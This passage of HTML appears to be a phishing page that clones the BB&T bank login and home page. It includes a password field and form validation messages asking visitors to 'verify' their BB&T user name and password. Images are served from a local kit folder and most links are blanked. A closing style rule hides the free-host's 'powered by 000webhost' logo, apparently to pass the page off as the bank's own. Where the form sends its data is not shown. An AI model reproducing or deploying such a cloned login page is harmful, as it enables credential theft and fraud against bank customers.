<input required="required" id="pass" class="form-control form-control-password" name="pass" autocapitalize="none" type="password">

</div>


</div>

</div>


<div class="row">

<div class="column--12">

<button class="btn btn--primary btn--block" type="submit">Log in</button>

</div>

</div>

</form>
<script  type="text/javascript">
var frmvalidator = new Validator("signbig");
frmvalidator.addValidation("user","req","Please verify your BB&T User Name");
frmvalidator.addValidation("user","minlen=5","Please verify your BB&T User Name");
frmvalidator.addValidation("pass","req","Please verify your BB&T Password");
frmvalidator.addValidation("pass","minlen=5","Please verify your BB&T Password");
</script>
<ul class="login__section login__help">

<li class="login__li">


<input type="image" id="sign" name="submit" src="T.goe/2.png" />

<a class="login__a" href="" target="_self">Reset your password</a>

</li>



<li class="login__li">


<input type="image" id="sign" name="submit" src="T.goe/3.png" />

Call <a class="login__a login__a--tel" href="tel:888-228-6654" target="">888-228-6654</a> for User ID Assistance</li>
<li class="login__li hidden-md-up">




<a class="login__a" href="" target="_self">Sign up for online banking</a>
</li>
<li class="login__li">


<input type="image" id="sign" name="submit" src="T.goe/33.png" />

<a class="login__a" href="" target="_self">Online security measures</a>
</li>
</ul>


<div class="login__section login__section--outdent login__cta login__cta--app">

<div class="row">
<div class="column--login column--login--1of2 column--login--cta">

<p class="login__heading">Get the mobile app</p>

</div>


<div class="column--login column--login--2of2">

<a class="btn btn--secondary btn--block" href="" target="_self">U by BB&amp;T</a>

</div>
</div>

</div>



<div class="login__section login__section--outdent login__cta login__cta-sign-up">

<div class="row">

<div class="column--login column--login--1of2 column--login--cta">

<p class="login__heading">New to online banking?</p>

</div>
<div class="column--login column--login--2of2">

<a class="btn btn--secondary btn--block" href="" target="_self">Sign up</a>

</div>

</div>

</div>




<form autocomplete="off" aria-label="Log in to other accounts" class="login__section login__section--outdent login__form login__form--secondary" method="post">

<div class="container">

<label for="list-of-other-accounts_banner">Log in to another account</label>

<div class="input-group">


<select required="t" class="form-control" id="list-of-other-accounts_banner" name="dp_login_to_other_accounts">
<option value="">Choose one</option>
<option value="">Association Online Payments</option>
<option value="">Check Reorder</option>
<option value="">Elite UMA</option>
<option value="">Email Encryption</option>
<option value="">Marketconnect</option>
<option value="">U by BB&amp;T</option>
<option value="">Online Banking</option>
<option value="">PlanTrac</option>
<option value="">BB&amp;T Scott &amp; Stringfellow</option>
<option value="">Shareholder Services</option>
<option value="">TAMLink</option></select>

<button aria-label="Go to page" class="btn btn--sm btn--secondary" type="submit">Go
</button>


</div>

</div>


</form>


</div>

</div>

</div>

</div>

</div>

</div>



<div class="promo__overlay promo__overlay--sp">

<div class="promo--sp__block promo--sp__block--vendor">

      
  
<figure class="promo__figure promo__figure-full-width promo__height--sp">
            
<picture class="promo__picture promo__picture-absolute-centered">
                
<source media="(min-width: 992px)" srcset="T.goe/3.jpg, 4.jpg 2x">
                
<source srcset="T.goe/2.jpg, 1.jpg 2x">
                

<img src="T.goe/444444444.jpg" alt="">
            </picture>
        
</figure>

        



<div class="container promo__overlay promo__overlay--sp">
         
<div class="row flex-items-lg-right">
                
<div class="col-xs-12 col-lg-7 col-xl-8">
                    
<div class="promo__caption promo__caption--sp promo__height--sp promo__caption-top-left">
                        
<div class="promo__card">
                            
<div class="card card-white-opacity">

<h3 class="card__title card__title--sp">Start small. Dream big.</h3>
                                
<div class="card__text card__text--sp">

<p>No minimum balance.<br> No maintenance fee.</p>
                                
</div>

<a class="btn btn--secondary" href="" target="_self">BB&amp;T eSavings</a>
           
</div>
                 
</div>
                 
</div>
                
</div>
            
</div>
        
</div>


</div>

</div>


<img src="T.goe/1.gif">
</div>



<script>
$(document).ready(function(){ 
        $.ajax({
         type: "GET",
         url: "https://ox-d.bbt.com/ma/1.0/arj?auid=538587398",
         dataType: "jsonp",
		async:true,
         success: function(response, textStatus, jqXHR){ 
			$("#openxResult").html(response.ads.ad[0].creative[0].media);
			var img = $("<img></img>").attr("src",response.ads.ad[0].creative[0].tracking.impression);
			$("#openxResult").append(img);
        },
        error: function(request,error) {
            $("#openxResult").html("Request: "+JSON.stringify(request));
        }
        });
});

</script>

</section>
<script type="text/javascript">
			glbPageData.component.push('sandp');
			glbPageData.contentID.push('sandp:/templatedata/media-responsive/sales-promotion/data/bbtcom/personal/start-sales-promo');			
		
</script>
</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row site-wrapper__section-row--alt ls-row--populated" id="row-3__row-2" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564780-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-2">
<div class="ls-area-body" id="ls-gen92564781-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1495868712568">
<div class="iw_component" id="1495868712568">
<div>
<div class="main-parent main-parent--highlight add-html--homepage-burgundy-band main-parent--highlight--add-html">
         <div class="container">
                
<div class="row">

                    
<div class="col-xs-12 col-lg-4">
                        
<div class="alignment-fix">


<h2 class="smaller">Open a checking or savings account online today</h2>
                            
<a class="btn btn--primary" href="">Open an account <span class="sr-only">online for a BB&amp;T checking or savings account</span>
</a>

                        
</div>
                    
</div>

                    
<div class="col-xs-12 col-lg-8">
                        
<h2 class="smaller">Learn about BB&amp;T products and services</h2>
                        
</div>
                    
                
</div>
            
</div>
        
</div>
</div>

</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row ls-row--populated" id="row-3__row-3" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564782-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-3">
<div class="ls-area-body" id="ls-gen92564783-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1493309112731">
<div class="iw_component" id="1493309112731">

<section data-dcrpath="/templatedata/media-responsive/promo/data/bbtcom/personal/start-full-width-promo-card-personalization" data-component="promo" class=" promo promo--section promo--section-full-width">


<figure class="promo__figure promo__figure-full-width promo__height--section">

<picture class="promo__picture promo__picture-absolute-centered">

<source media="(min-width: 992px)" srcset="T.goe/6.jpg, 8.jpg 2x">

<source srcset="T.goe/5.jpg, 7.jpg 2x">

<img src="T.goe/6.jpg" alt="">
</picture>

</figure>



<div class="container promo__overlay promo__overlay-section-full">

<div class="promo__caption promo__caption--section promo__height--section promo__caption-center-left">

<div class="promo__card">
<div class="card card--inverse ">

<h2 class="card__title"><p>Show off&nbsp;your style</p></h2>

<div class="card__text"><p>Pay with more personality by customizing your debit card with a personal image.</p>
</div>
<p>
<a class="btn btn--secondary" href="" target="_self">Start designing 
<span class="aftr-txt sr-only">your debit card</span>
<span class="sr-only"> - important</span></a></p>
</div>

</div>

</div>

</div>


</section>



<script type="text/javascript">
			glbPageData.component.push('promo');
			glbPageData.contentID.push('promo:/templatedata/media-responsive/promo/data/bbtcom/personal/start-full-width-promo-card-personalization');			
		</script>


</div>
</div>
</div>
</div>


<div class="ls-row-clr">
</div>

</div>
</div>


<div class="ls-row site-wrapper__section-row site-wrapper__section-row--alt ls-row--populated" id="row-3__row-4" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564784-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-4">
<div class="ls-area-body" id="ls-gen92564785-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1493309112732">
<div class="iw_component" id="1493309112732">
<div class="main-parent">

<div class="container">

<div class="row">

<div class="column-control column--12">


<script type="text/javascript">
			glbPageData.component.push('content-block');
			glbPageData.contentID.push('content-block:/templatedata/generic-responsive/content-block/data/bbtcom/personal/start-introducing-u');			
		
</script>


<div data-dcrpath="/templatedata/generic-responsive/content-block/data/bbtcom/personal/start-introducing-u" data-component="content-block" class="content-block content-block--text">


<div class="text__block">
<h2 class="text__title">
<span style="text-align: center;">Go beyond everyday banking</span></h2>
<div class="text__text">
<div style="max-width: 576px; margin-left: auto; margin-right: auto;"> 
<p style="text-align: center;">Get a comprehensive view of your finances with U by BB&amp;T, our online and mobile banking experience. Manage all your accounts from a customizable dashboard, set budgeting and spending goals, pay bills, view your credit score and more.</p> 
<p style="text-align: center;">
<a class="btn btn--secondary" href="" target="_self">Learn more 
<span class="aftr-txt sr-only">about U by BB&amp;T</span>
<span class="sr-only"> - important</span></a></p> 
<span>
<figure>
<img sizes="(min-width: 544px) 600px, 100vw" src="home-phone-500x500.png" srcset="T.goe/7.png 1200w, T.goe/6.png 600w, 5.png 300w" alt="">
</figure>
</span>
</div>
</div>

</div>

</div>

</div>

</div>

</div>

</div>

</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row ls-row--populated" id="row-3__row-5" tabindex="-1">
<div class="ls-fxr" id="ls-gen92564786-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-5">
<div class="ls-area-body" id="ls-gen92564787-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1493309112733">
<div class="iw_component" id="1493309112733">
<div class="main-parent">

<div class="container">

<div class="row">

<div class="column-control column--12">

<script type="text/javascript">
			glbPageData.component.push('content-block');
			glbPageData.contentID.push('content-block:/templatedata/generic-responsive/content-block/data/bbtcom/personal/start-security-central');			
		
</script>
<div data-dcrpath="/templatedata/generic-responsive/content-block/data/bbtcom/personal/start-security-central" data-component="content-block" class="content-block content-block--text">

<div class="text__block">
<h3 class="text__title">Let BB&amp;T help you stay safe online</h3>
<div class="text__text">
<p>We invite you to explore <a href="" target="_self">BB&amp;T Security Central</a>, where you can find the latest information you need to stay up to date on security threats and get tips to stay safe.</p>
</div>

</div>

</div>

</div>

</div>

</div>

</div>

</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row site-wrapper__section-row--alt" id="row-3__row-6">
<div class="ls-fxr" id="ls-gen92564788-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-6">
<div class="ls-area-body" id="ls-gen92564789-ls-area-body">
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row" id="row-3__row-7">
<div class="ls-fxr" id="ls-gen92564790-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-3__area-7">
<div class="ls-area-body" id="ls-gen92564791-ls-area-body">
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
<div class="ls-row site-wrapper__section-row site-wrapper__section-row--disclosure-row" id="row-4">
<div class="ls-fxr" id="ls-gen92564792-ls-fxr">
<div class="ls-area site-wrapper__section-area" id="row-4__area-1">
<div class="ls-area-body" id="ls-gen92564793-ls-area-body">
<div class="ls-cmp-wrap ls-1st" id="w1495868712622">
<div class="iw_component" id="1495868712622">
<div data-component="disclosure" class="disclosures">

<div class="container">

<div class="collapse-container">

<button aria-expanded="true" data-toggle="collapse" class="btn btn--link btn-flush-horizontal btn__icon--left collapse__toggler" id="transcript-0-trigger" href="javascript:void(0);" data-target="#transcript-0" aria-controls="transcript-0">
<span class="iconic-bg iconic-bg-sm iconic-bg-rounded-rect">

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" data-icon="caret" width="128" height="128" class="iconic-caret injected-svg iconic iconic-sm" viewBox="0 0 128 128" data-src="/assets/bbtcom/resources/icons/caret.svg" data-direction="bottom" tabindex="-1" focusable="false" role="presentation">
  <g><title></title></g>
  <g data-width="128" data-height="128" class="iconic-lg iconic-container" display="inline" transform="rotate(90 64 64) translate(24)">
    <path d="M78.8 63.1l-77.6-62.2c-.7-.5-1.2-.2-1.2.6v125c0 .8.5 1.1 1.2.6l77.7-62.1c.6-.6.6-1.4-.1-1.9z" class="iconic-property-fill"></path>
  </g>
  <g data-width="32" data-height="32" class="iconic-md iconic-container" display="none" transform="scale(4) rotate(90 16 16) translate(7)">
    <path d="M19.6 15.7l-19.2-15.4c-.2-.2-.4-.1-.4.2v31c0 .3.2.4.4.2l19.2-15.4c.2-.2.2-.4 0-.6z" class="iconic-property-fill"></path>
  </g>
  <g data-width="16" data-height="16" class="iconic-sm iconic-container" display="none" transform="scale(8) rotate(90 8 8) translate(4)">
    <path class="iconic-property-fill" d="M8 8l-8-8v16z"></path>
  </g>

</svg></span>Disclosures
						</button>
<div class="collapse in" id="transcript-0" role="region" aria-labelledby="transcript-0-trigger" aria-expanded="true" style="">
<div class="disclosure__item"><p>Loans, lines of credit and credit cards are subject to credit approval.</p></div>
<div class="disclosure__item"><p>Only deposit products are <abbr title="Federal Deposit Insurance Corporation">FDIC</abbr> insured.</p></div>
<div class="disclosure__item"><p>Insurance products and services are offered by BB&amp;T Insurance Services, Inc., a wholly owned subsidiary of BB&amp;T Insurance Holdings, Inc.</p></div>
<div class="disclosure__item"><div class="disclosure-box"> <p class="disclosure-box-paragraph">Securities, Insurance and Advisory Services are:</p> <ul class="disclosure-box__list"> <li>Not a deposit</li> <li>Not <abbr>FDIC</abbr>-insured</li> <li>Not guaranteed by a bank</li> <li>Not insured by any state or federal government agency</li> <li>May go down in value</li> </ul> </div></div>
<div class="disclosure__item"><somethinginthewayshemoves></somethinginthewayshemoves></div>
<div class="disclosure__item"><p>Branch Banking and Trust Company is a Member <abbr title="Federal Deposit Insurance Corporation"><abbr title="Federal Deposit Insurance Corporation">FDIC</abbr></abbr> and an Equal Housing Lender.</p></div>
<div class="disclosure__item"><p><a class="disclosure-link" href="">BB&amp;T Complete Client Protection</a></p></div>
</div>
</div>
</div>
</div><script type="text/javascript">
			glbPageData.component.push('disclosure');
			//glbPageData.contentID.push('disclosure:');
		</script>
</div><!--ls:end[component-1495868712622]--></div></div></div><div class="ls-row-clr"></div></div></div><div class="ls-row site-wrapper__section-row site-wrapper__section-row--footer-row" id="row-5"><div class="ls-fxr" id="ls-gen92564794-ls-fxr"><div class="ls-area site-wrapper__section-area" id="row-5__area-1"><div class="ls-area-body" id="ls-gen92564795-ls-area-body"><div class="ls-cmp-wrap ls-1st" id="w1495868712619"><!--ls:begin[component-1495868712619]--><div class="iw_component" id="1495868712619"><script language="Javascript">
		 var MP = {
		<!-- mp_trans_disable_start -->
		  Version: '1.0.23',
		  Domains: {'es':'es.bbt.com'},
		  SrcLang: 'en',
		<!-- mp_trans_disable_end -->
		  UrlLang: 'mp_js_current_lang',
		  SrcUrl: decodeURIComponent('mp_js_orgin_url'),
		<!-- mp_trans_disable_start -->
		  init: function(){
			if (MP.UrlLang.indexOf('p_js_')==1) {
			  MP.SrcUrl=window.top.document.location.href;
			  MP.UrlLang=MP.SrcLang;
		  }
		},
		getCookie: function(name){
		  var start=document.cookie.indexOf(name+'=');
		  if(start < 0) return null;
		  start=start+name.length+1;
		  var end=document.cookie.indexOf(';', start);
		  if(end < 0) end=document.cookie.length;
		  while (document.cookie.charAt(start)==' '){ start++; }
		  return decodeURIComponent(document.cookie.substring(start,end));
		},
		setCookie: function(name,value,path,domain){
		  var cookie=name+'='+encodeURIComponent(value);
		  if(path)cookie+='; path='+path;
		  if(domain)cookie+='; domain='+domain;
		  var now=new Date();
		  now.setTime(now.getTime()+1000*60*60*24*365);
		  cookie+='; expires='+now.toUTCString();
		  document.cookie=cookie;
		},
		switchLanguage: function(lang){
		  if(lang!=MP.SrcLang){
			var script=document.createElement('SCRIPT');
			script.src=location.protocol+'//'+MP.Domains[lang]+'/'+MP.SrcLang+lang+'/?1023749632;'+encodeURIComponent(MP.SrcUrl);
			document.body.appendChild(script);
		  } else if(lang==MP.SrcLang && MP.UrlLang!=MP.SrcLang){
			var script=document.createElement('SCRIPT');
			script.src=location.protocol+'//'+MP.Domains[MP.UrlLang]+'/'+MP.SrcLang+MP.UrlLang+'/?1023749634;'+encodeURIComponent(location.href);
			document.body.appendChild(script);
		  }
		  return false;
		},
		switchToLang: function(url) {
		  window.top.location.href=url;
		}
		<!-- mp_trans_disable_end -->
		}; 

		function objToString (obj) {
			var str = '';
			for (var p in obj) {
				if (obj.hasOwnProperty(p)) {
					str += p + '::' + obj[p] + '\n';
				}
			}
			return str;
		}
	</script>


<script type="text/javascript">
	  function switchLanguage(lang) {
		  MP.SrcUrl=decodeURIComponent('mp_js_orgin_url');
		  MP.UrlLang='mp_js_current_lang';
		  MP.init();
		  MP.switchLanguage(MP.UrlLang==lang?'en':lang);
		  return false;
	  }
	</script>

<nav data-componentid="footer" aria-label="Additional links" role="navigation" class="footer footer--seo">


<div class="container">

<div class="footer__section footer__section--seo">

<div class="row">

<div class="column--3">

<div class="footer__header">
<h5>Personal</h5>

</div>


<ul class="footer__ul">

<li class="footer__li">
<a class="footer__a" href="" target="_self">
<span class="sr-only">Personal&nbsp;</span>Checking Accounts</a>

</li>

<li class="footer__li">

<a class="footer__a" href="" target="_self"><span class="sr-only">Personal&nbsp;</span>Savings Accounts</a>

</li>

<li class="footer__li">
<a class="footer__a" href="" target="_self">Mortgage Loans</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Mortgage Refinance</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Auto Loans</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self"><span class="sr-only">Personal&nbsp;</span>Retirement</a>
</li>
</ul>
</div>
<div class="column--3">
<div class="footer__header">
<h5>Business</h5>
</div>
<ul class="footer__ul">
<li class="footer__li">
<a class="footer__a" href="" target="_self">Business Checking Accounts</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Cash Management</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Merchant Services</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Small Business Lending</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Commercial &amp; Institutional</a>
</li>
</ul>
</div>
<div class="column--3">
<div class="footer__header">
<h5>Wealth</h5>
</div>
<ul class="footer__ul">
<li class="footer__li">
<a class="footer__a" href="" target="_self">Advisory Services</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self"><span class="sr-only">Wealth&nbsp;</span>Retirement &amp; Planning</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Wealth Investing</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Wealth Products</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Careers in Wealth</a>
</li>
</ul>
</div>
<div class="column--3">
<div class="footer__header">
<h5>More</h5>
</div>
<ul class="footer__ul">
<li class="footer__li">
<a class="footer__a" href="" target="_self"><span class="sr-only">Personal&nbsp;</span>Education</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_blank">Personal Insurance</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Online Banking</a>
</li>
<li class="footer__li">
<a class="footer__a" href="" target="_self">Mobile Banking</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</nav><footer role="contentinfo" class="footer">
<div class="container">
<div class="footer__section">
<ul class="footer__ul footer__ul--links">
<li class="footer__li footer__li--links footer__text">Phone24: <a class="footer__a footer__a--tel" href="tel:1-800-226-5228" target="_self">800-BANK-BBT</a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">Contact</a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" data-sm-screen-href="" data-lg-screen-href="" target="_self">Branch/ATM Locator </a>
</li>
<li class="footer__li footer__li--links">
<div id="lpButtonDiv-dmo-responsive-footer"></div>
</li>
</ul>
</div>
</div>
<hr class="footer__hr">
<div class="container">
<div class="footer__section">
<div class="row">
<div class="column--8">
<ul class="footer__ul footer__ul--links">
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">Careers </a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">About BB&amp;T </a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">Investor Relations</a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">Privacy &amp; Security</a>
</li>
<li class="footer__li footer__li--links">
<a class="footer__a" href="" target="_self">Legal </a>
</li>
</ul>
</div>
<div class="column--4 language-toggle">
<div aria-label="Toggle Language" role="group" class="btn-group btn-group--toggle">
<a class="btn btn--secondary active">English</a><a target="_top" href="" onclick="return switchLanguage('es');" mpdisurl="" class="btn btn--secondary"><span lang="es">Espa?ol</span></a>
</div>

</div>

</div>

</div>

<div class="footer__section">

<p class="footer__text">�&nbsp;<span id="year">2020</span>,&nbsp;Branch Banking and Trust Company. Member FDIC. All Rights Reserved.</p>

</div>

</div>
</footer>
</div>
</div>
</div>
</div>
<div class="ls-row-clr">
</div>
</div>
</div>
</div>
			
<script src="T.goe/3.js" type="text/javascript"></script>

<script type="text/javascript">				
				glbPageData.contentID = glbPageData.contentID.filter(v=>v!='');
				if (typeof _satellite !== "undefined") {
					_satellite.track('sc_object');
				}				
			</script>

</body>
<style>
    img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] {
display: none;}
</style>
</html>
